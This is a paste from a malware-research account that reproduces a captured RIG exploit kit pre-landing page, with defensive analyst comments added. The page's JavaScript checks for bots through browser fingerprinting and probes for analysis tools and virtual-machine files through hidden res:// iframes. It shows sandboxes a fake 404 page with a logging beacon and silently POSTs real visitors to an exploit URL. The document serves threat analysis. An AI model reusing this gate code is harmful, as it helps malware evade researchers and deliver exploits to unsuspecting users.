MalwareBreakdown

RIG's new pre-landing page

Mar 7th, 2017
  1. HTTP/1.1 200 OK
  2. Server: nginx/1.10.1
  3. Date: Mon, 06 Mar 2017 22:00:15 GMT
  4. Content-Type: text/html; charset=utf-8
  5. Transfer-Encoding: chunked
  6. Connection: keep-alive
  7. Vary: Accept-Encoding
  8. X-Powered-By: PHP/5.4.45
  9. Expires: Thu, 21 Jul 1977 07:30:00 GMT
  10. Last-Modified: Mon, 06 Mar 2017 22:00:15 GMT
  11. Cache-Control: max-age=0
  12. Pragma: no-cache
  13.  
  14. ec5
  15. <!DOCTYPE html>
  16. <html lang="en">
  17. <head>
  18. <title></title>
  19. <meta charset="UTF-8">
  20. <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
  21. <meta name="apple-mobile-web-app-capable" content="yes">
  22. <meta name="apple-mobile-web-app-status-bar-style" content="black">
  23. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  24. </head>
  25. <body>
  26. <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
  27. <script>
// Gate state shared by every function below. go() is started by the hidden
// iframe's onload handler in the markup above (window.setTimeout('go()', 99)).
// NormalURL: where visitors that pass the checks are POSTed via a hidden form
// (see finishChecking()/go()). The dots look bracket-defanged in this capture.
var NormalURL = 'http://try[.]WERREW[.]INFO/?oq=m3Wp_YrLbNVNVDhiECBclBhnYlZW1NHovv9h0jUzR6fhMHQ-UHbUTp1u9CQUbI&q=wXjQMvXcJwDQCobGMvrESLtNNknQA0KK2Iv2_dqyEoH9cmnihNzUSkrx6B2aC';
// InfoStr: fingerprint string appended to by getBrowser() and finishChecking()
// and sent back as the `info` query parameter of /log.php.
var InfoStr = '';
// Probe bookkeeping. appPaths is re-declared (harmlessly) two lines down;
// foundAppsCounter is not referenced anywhere else in the visible script.
var appPaths,foundObjects,appsCount,framesLoaded,foundAppsCounter,iFrameObject;
// id/name prefix of the per-path probe iframes ("myFrame" + index).
var iFrameName = 'myFrame';
// deb() only writes to the console when this is true.
var debug = false;
// Incremented by finishChecking(); go() tests it with a loose `== false`.
var isChecked = 0;
// res:// probe URLs (genPaths is a hoisted function declaration, so the
// call is valid here).
var appPaths = genPaths();
  35.  
  36.  
/**
 * Browser fingerprint / sandbox-detection routine.
 *
 * Step 1 derives a browser name and version from navigator.userAgent.
 * Step 2 (desktop IE/Chrome/Firefox only) cross-checks that claim against
 * feature detection (ActiveXObject, window.chrome, Firefox-only and
 * WebKit-only globals, an HTML5 feature bitfield). If the UA-claimed browser
 * and the feature-detected browser disagree, the visitor is flagged as a bot
 * (is_bot = true) -- the classic spoofed-UA / headless-crawler check.
 *
 * Side effects: appends a summary to the global InfoStr and, because only
 * isIE is declared with `var` below, leaks isChrome/isFirefox/isOpera as
 * implicit globals.
 *
 * @returns {{browser:string, browser_real:string, is_bot:boolean,
 *            browser_quality:number, platform:string,
 *            versionFull:string, versionShort:string}}
 */
function getBrowser() {
var ua = navigator.userAgent;

var browsrObj = {
browser: 'unknown',
browser_real: '',
is_bot: false,
browser_quality: 0,
platform: 'desktop',
versionFull: '',
versionShort: ''
};

// Everything UA-related is wrapped in try/catch: a UA that does not match the
// expected split() patterns would throw on `version.split` below, and the
// gate would rather silently keep 'unknown' than error out.
try{

// Order matters: Edge and Opera UAs also contain "Chrome"/"Safari".
var bName = function () {
if (ua.search(/Edge/) > -1) return "edge";
if ((ua.search(/MSIE/) > -1) || (ua.search(/Trident/) > -1)) return "ie";
if (ua.search(/Firefox/) > -1) return "firefox";
if ((ua.search(/Opera/) > -1) || (ua.search(/OPR/) > -1)) return "opera";
if (ua.search(/YaBrowser/) > -1) return "yabrowser";
if (ua.search(/Chrome/) > -1) return "chrome";
if (ua.search(/Safari/) > -1) return "safari";
if (ua.search(/Maxthon/) > -1) return "maxthon";
else return "unknown";
}();

browsrObj.browser = bName;

// Mobile visitors are never feature-checked (see the platform test below).
if(/iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase())) browsrObj.platform = 'mobile';


var version;
if(bName != 'unknown')
{
switch (bName) {
case "edge":
version = (ua.split("Edge")[1]).split("/")[1];
break;
case "ie":
// Trident (IE11) puts the version in "rv:"; older IE uses "MSIE x.y;".
if((ua.search(/Trident/) > -1))
{
version = (ua.split("; rv:")[1]).split(")")[0];
}
else
{
version = (ua.split("MSIE ")[1]).split(";")[0];
}
break;
case "firefox":
version = ua.split("Firefox/")[1];
break;
case "opera":
version = ua.split("Version/")[1];
break;
// Dead branch: bName above never returns "operaWebkit".
case "operaWebkit":
bName = "opera";
version = ua.split("OPR/")[1];
break;
case "yabrowser":
version = (ua.split("YaBrowser/")[1]).split(" ")[0];
break;
case "chrome":
version = (ua.split("Chrome/")[1]).split(" ")[0];
break;
case "safari":
version = (ua.split("Version/")[1]).split(" ")[0];
break;
case "maxthon":
version = ua.split("Maxthon/")[1];
break;

}

browsrObj.versionFull = version;
browsrObj.versionShort = version.split(".")[0];
}

} catch (err) {}


var w=window,d=document;
var CorrectBrowser = true;
// Alias of the same object; the comparison at the end is therefore
// browser (UA claim) vs. browser_real (feature detection) of one record.
var uaBrowser = browsrObj;
// Only isIE is local here; the chained assignment makes the other three
// implicit globals.
var isIE = isChrome = isFirefox = isOpera = 0;

// Feature cross-check, desktop IE/Chrome/Firefox only. Other browsers leave
// browser_real empty and are never flagged as bots.
if(uaBrowser.platform != 'mobile' && (browsrObj.browser == 'ie' || browsrObj.browser == 'chrome' || browsrObj.browser == 'firefox'))
{
if('ActiveXObject' in window) isIE++;
if('chrome' in window) isChrome++;
if('opera' in window) isOpera++;

// Firefox-only (Gecko) globals.
if('getBoxObjectFor' in d || 'mozInnerScreenX' in w) isFirefox++;

// WebKit/Blink-only globals; Chrome needs both this and `window.chrome`
// to reach the `isChrome > 1` threshold below.
if('WebKitCSSMatrix' in w||'WebKitPoint' in w||'webkitStorageInfo' in w||'webkitURL' in w) isChrome++;


// HTML5 capability bitfield; a browser exposing none of these is
// treated as (old) IE.
var f=0;
f|='sandbox' in d.createElement('iframe')?1:0;
f|='WebSocket' in w?2:0;
f|=w.Worker?4:0;
f|=w.applicationCache?8:0;
f|=w.history && history.pushState?16:0;
f|=d.documentElement.webkitRequestFullScreen?32:0;
f|='FileReader' in w?64:0;


if(f==0) isIE++;

if(isIE > 0)
{
browsrObj.browser_real = 'ie';
// The next three lines are ONE statement (`browsrObj.browser_quality = isIE;`)
// split by the HTTP chunk-size line "1000" in the raw capture; the "1000"
// is transfer framing, not script.
browsr
1000
Obj.browser_quality = isIE;
}
if(isChrome > 1 && isFirefox == 0)
{
browsrObj.browser_real = 'chrome';
browsrObj.browser_quality = isChrome;
}
if(isFirefox > 0 && isChrome == 0)
{
browsrObj.browser_real = 'firefox';
browsrObj.browser_quality = isFirefox;
}

// Spoofed UA (or a crawler/sandbox whose engine does not match its UA)
// -> bot. Also true when none of the three detectors fired (browser_real '').
if(uaBrowser.browser != uaBrowser.browser_real) browsrObj.is_bot = true;
}

// Fingerprint summary later exfiltrated via /log.php?info=...
InfoStr += browsrObj.browser+'-'+browsrObj.browser_real+'_ie'+isIE+'chrome'+isChrome+'firefox'+isFirefox;

return browsrObj;
}
  171.  
/**
 * Debug logger; a no-op (returns false) unless the global `debug` is true.
 * @param {*} o - value passed to console.log
 */
function deb(o) {
if (!debug) return false;
console.log(o);
}
  176.  
/**
 * Returns the Internet Explorer major/minor version as a float, or -1 when
 * the browser does not identify as IE.
 *
 * Legacy IE reports appName "Microsoft Internet Explorer" with "MSIE x.y";
 * IE11 reports appName "Netscape" and carries the version in "Trident/... rv:x.y".
 * Relies on the non-standard static RegExp.$1 to read the capture group.
 *
 * @returns {number} IE version, or -1
 */
function getInternetExplorerVersion() {
var rv = -1;
if (navigator.appName == 'Microsoft Internet Explorer') {
var ua = navigator.userAgent;
var re = new RegExp("MSIE ([0-9]{1,}[\.0-9]{0,})");
if (re.exec(ua) != null)
rv = parseFloat( RegExp.$1 );
} else if (navigator.appName == 'Netscape') {
var ua = navigator.userAgent;
var re = new RegExp("Trident/.*rv:([0-9]{1,}[\.0-9]{0,})");
if (re.exec(ua) != null)
rv = parseFloat( RegExp.$1 );
}
return rv;
}
  192.  
  193.  
/**
 * Creates one 1x1 probe iframe for appPaths[c] and appends it to the body.
 *
 * The iframe's src is the res:// URL built by genPaths() (a path to an
 * analysis-tool or VM-tools binary on the visitor's disk). readystatechange
 * events are counted by objectCheckState(c); the load event triggers
 * countFrameLoaded(c), which interprets those counts. On IE11 the handlers
 * are attached as inline attribute strings instead of listeners.
 *
 * Only IE honours res:// this way, which is why the gate is built around it;
 * for defenders, a 1x1 iframe whose src starts with "res://C:\\Program Files"
 * is a strong indicator of this local-file probing.
 *
 * @param {number} c - index into the global appPaths
 */
function createiFrame(c){
var d=document.createElement('iframe');
d.setAttribute('id',iFrameName+c);
d.setAttribute('name',iFrameName+c);
d.style['width']='1px'
d.style['height']='1px';

function zrs(){objectCheckState(c);}
function zlo(){countFrameLoaded(c);}

if (getInternetExplorerVersion()==11) {
d.setAttribute('onReadyStateChange',"objectCheckState('"+c+"')");
d.setAttribute('onLoad',"countFrameLoaded('"+c+"')");
} else {
if(d['addEventListener']){
d['addEventListener']('readystatechange',zrs,false);
d['addEventListener']('load',zlo,false);
}else {
// attachEvent fallback for pre-IE9.
if(d['attachEvent']){
d['attachEvent']('on'+'readystatechange',zrs);
d['attachEvent']('on'+'load',zlo);
}
}
}

d.setAttribute('src',appPaths[c]['res']);
document.body.appendChild(d);
}
  222.  
/**
 * readystatechange handler for probe iframe c.
 *
 * Records, on the appPaths[c] entry itself, how many times each readyState
 * value (e.g. 'interactive', 'complete') was observed, plus a total
 * `stateIterate` counter on IE11. countFrameLoaded() later reads
 * appPaths[c]['interactive'] and appPaths[c]['stateIterate'] to decide whether
 * the res:// target resolved.
 *
 * @param {number|string} c - probe index (a string when invoked from the
 *   IE11 inline attribute handler)
 */
function objectCheckState(c){
if (getInternetExplorerVersion()==11) {
if (!appPaths[c]['stateIterate']) appPaths[c]['stateIterate']=1; else appPaths[c]['stateIterate']++;
}

// Keyed by the readyState string, so the entry doubles as a histogram.
var rs = document.getElementById(iFrameName+c).readyState;
if (!appPaths[c][rs]) appPaths[c][rs]=1; else appPaths[c][rs]++;
}
  231.  
  232.  
/**
 * load handler for probe iframe c.
 *
 * Heuristic: more than one 'interactive' readystatechange (or exactly one
 * state change on IE11) is taken to mean the res:// resource exists, and the
 * entry's name is appended to the global foundObjects. Once every probe has
 * loaded (framesLoaded == appsCount) finishChecking() makes the verdict.
 *
 * @param {number|string} c - probe index
 */
function countFrameLoaded(c){
var _cfl_appName=appPaths[c]['name'];
var _cfl_appType=appPaths[c]['type'];
if(appPaths[c]['interactive']>1 || (appPaths[c]['stateIterate']==1 && getInternetExplorerVersion()==11)){
foundObjects.push(_cfl_appName);
} else {
};
framesLoaded++;
if (framesLoaded==appsCount) {
finishChecking();
}
}
  245.  
  246.  
/**
 * Final verdict, run once all probe iframes have loaded.
 *
 * - If getBrowser() flagged a bot, or any analysis tool / VM artefact was
 *   found, the page overwrites itself with a fake Apache "404 Not Found" and
 *   embeds a 10x10 iframe that beacons the fingerprint to /log.php?info=...
 *   (an analyst on a VM therefore sees a 404 plus one extra request).
 * - Otherwise a hidden form targeting _parent is written into the
 *   about:blank iframe from the markup (window.frames[0]) and submitted,
 *   POSTing the visitor on to NormalURL.
 * Afterwards every probe iframe is removed.
 *
 * Implicit globals: BrowserInfo, dopStr and the loop variable i are assigned
 * without var.
 */
function finishChecking()
{

BrowserInfo = getBrowser();
isChecked++;

if (foundObjects.length>0) {
// Loop body is commented out, so the marker is always just 'VM'
// regardless of which entries matched.
dopStr = 'VM';
for (i in foundObjects) {
//dopStr = dopStr+'_'+foundObjects[i];
}
InfoStr =InfoStr+dopStr;
}

if(BrowserInfo.is_bot == true || foundObjects.length>0)
{
document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'" width=10 height=10></iframe></body></html>');
}
else
{
window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
}

// NOTE(review): after document.write() on a loaded document the probe
// iframes presumably no longer exist, so deleteiFrame() would hit a null
// element on the 404 path -- unhandled here; confirm in a live trace.
var b=0;
for(b=0;b<appsCount;b++){
deleteiFrame('myFrame'+b);
}
}
  275.  
  276.  
/**
 * Removes the element with id c from the DOM. No null check: throws a
 * TypeError if the element is already gone.
 * @param {string} c - element id ("myFrame" + index)
 */
function deleteiFrame(c){
var d=document.getElementById(c);
d.parentNode.removeChild(d);
}
  281.  
/**
 * Builds the list of local files to probe for via res:// URLs.
 *
 * Each entry names an analysis tool (Fiddler, JPEXS FFDec) or VM guest
 * component (VirtualBox Guest Additions, VMware Tools); two AV entries are
 * commented out. For every 'pf' entry two URLs are produced, one under
 * "C:\Program Files\" and one under "C:\Program Files (x86)\", each with the
 * resource suffix (`resident`) appended. The 'driver' branch is never taken
 * by the visible list -- every entry is filetype 'pf'.
 *
 * For defenders: these exact file paths are what the gate is fingerprinting,
 * so a sandbox exposing them (or an IE profile answering res:// for them)
 * is what the gate is trying to exclude.
 *
 * @returns {Array<{name:string,res:string,resident:string,type:string,filetype:string}>}
 */
function genPaths() {

var path_sys32 = '\\Windows\\System32\\drivers\\',
path_pf = 'C:\\Program Files\\',
path_pfx86 = 'C:\\Program Files (x86)\\';

var appPath = [
{name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\Fiddler.exe',type:'tool',filetype:'pf'},
{name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\uninst.exe',type:'tool',filetype:'pf'},
{name:'FFDec',resident:'/#24/1',res:'FFDec\\Uninstall.exe',type:'tool',filetype:'pf'},
/*{name:'NOD32',resident:'/#24/1',res:'ESET\\ESET NOD32 Antivirus\\egui.exe',type:'av',filetype:'pf'},
{name:'Bitdefender',resident:'/#24/1',res:'Bitdefender Agent\\ProductAgentService.exe',type:'av',filetype:'pf'},
*/
// The next three lines are ONE object literal ({name:'VirtualBox',...})
// split by the HTTP chunk-size line "921" in the raw capture; the "921"
// is transfer framing, not script.
{na
921
me:'VirtualBox',resident:'/#24/#1',res:'Oracle\\VirtualBox Guest Additions\\uninst.exe', type:'vm',filetype:'pf'},
{name:'VMware',resident:'/#16/#1',res:'VMware\\VMware Tools\\TPAutoConnSvc.exe',type:'vm',filetype:'pf'},
{name:'VMware',resident:'/#24/2',res:'VMware\\VMware Tools\\VMToolsHook.dll',type:'vm',filetype:'pf'}
];

var appPathsCompilled = [];
for(var i=0;i<appPath.length;i++) {
// Unused by the current list (no 'driver' entries).
if (appPath[i]['filetype']=='driver') {
appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_sys32 + appPath[i]['res'] + '.sys' + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
}

// One probe per Program Files location, x86 first.
if (appPath[i]['filetype']=='pf') {
appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pfx86 + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pf + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
}
}

return appPathsCompilled;
}
  316.  
/**
 * Entry point, invoked from the hidden iframe's onload via setTimeout.
 *
 * Resets the probe state, creates one probe iframe per appPaths entry, and
 * then -- because the frames' load events have not fired yet at this point,
 * isChecked is normally still 0 -- immediately runs the UA-only bot check:
 * bots get the fake 404 with a "NOchecked" beacon to /log.php, everyone else
 * is POSTed straight to NormalURL through window.frames[0]. The res://
 * probe verdict in finishChecking() follows asynchronously, if the frames
 * ever finish loading in the redirected page.
 */
function go()
{
foundObjects=[];
appsCount=appPaths.length;
framesLoaded=0;
iFrameObject={};

for(var c=0;c<appsCount;c++){
if (typeof appPaths[c] == 'undefined') deb('IS UNDEFINED '+c);
createiFrame(c);
}

// Loose comparison: 0 == false.
if(isChecked == false)
{
BrowserInfo = getBrowser();
if(BrowserInfo.is_bot == true)
{
document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'NOchecked" width=10 height=10></iframe></body></html>');
}
else
{
window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
//document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="log.php?info='+InfoStr+'NOcheckedNOBOT'+getInternetExplorerVersion()+'" width=10 height=10></iframe></body></html>');
}
}
}
  343.  
  344. </script>
  345.  
  346. 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement